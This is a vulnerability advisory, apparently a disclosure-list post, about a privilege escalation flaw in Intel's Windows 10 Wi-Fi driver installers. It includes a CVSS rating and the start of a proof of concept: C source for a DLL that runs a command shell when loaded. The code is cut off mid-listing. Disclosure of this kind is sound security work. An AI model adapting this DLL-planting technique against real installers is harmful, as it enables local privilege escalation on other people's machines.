Windows 10 Wi-Fi Drivers For Intel Wireless Adapters version 22.30.0 suffer from a privilege escalation vulnerability.
Hi @ll,
the executable installers version 22.30.0 (Latest), published 2/23/2021,
for the "Windows® 10 Wi-Fi Drivers for Intel® Wireless Adapters",
<https://downloadmirror.intel.com/30208/a08/WiFi_22.30.0_Driver32_Win10.exe>
and
<https://downloadmirror.intel.com/30208/a08/WiFi_22.30.0_Driver64_Win10.exe>,
available from
<https://downloadcenter.intel.com/download/30208/Windows-10-Wi-Fi-Drivers-for-Intel-Wireless-Adapters>
are (SURPRISE!) vulnerable: they allow arbitrary code execution WITH
local escalation of privilege.
CVSS 3.0 score: 8.2 (High)
CVSS 3.0 vector: 3.0/AV:L/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H
Demonstration:
~~~~~~~~~~~~~~
0. Log on with an arbitrary user account.
1. Save the following source as poc.c in an arbitrary directory:
--- poc.c ---
// Copyright (C) 2004-2021, Stefan Kanthak <[email protected]>
#define STRICT
#define UNICODE
#define WIN32_LEAN_AND_MEAN
#include <windows.h>
const STARTUPINFO si = {sizeof(si)};
__declspec(safebuffers)
BOOL WINAPI _DllMainCRTStartup(HANDLE hModule,
                               DWORD dwReason,
                               CONTEXT *lpContext)
{
    WCHAR szCmdLine[] = L"CMD.exe /D /K WHOAMI.exe /ALL";
    PROCESS_INFORMATION pi;
#if 0
    if (dwReason != DLL_PROCESS_ATTACH)
        return FALSE;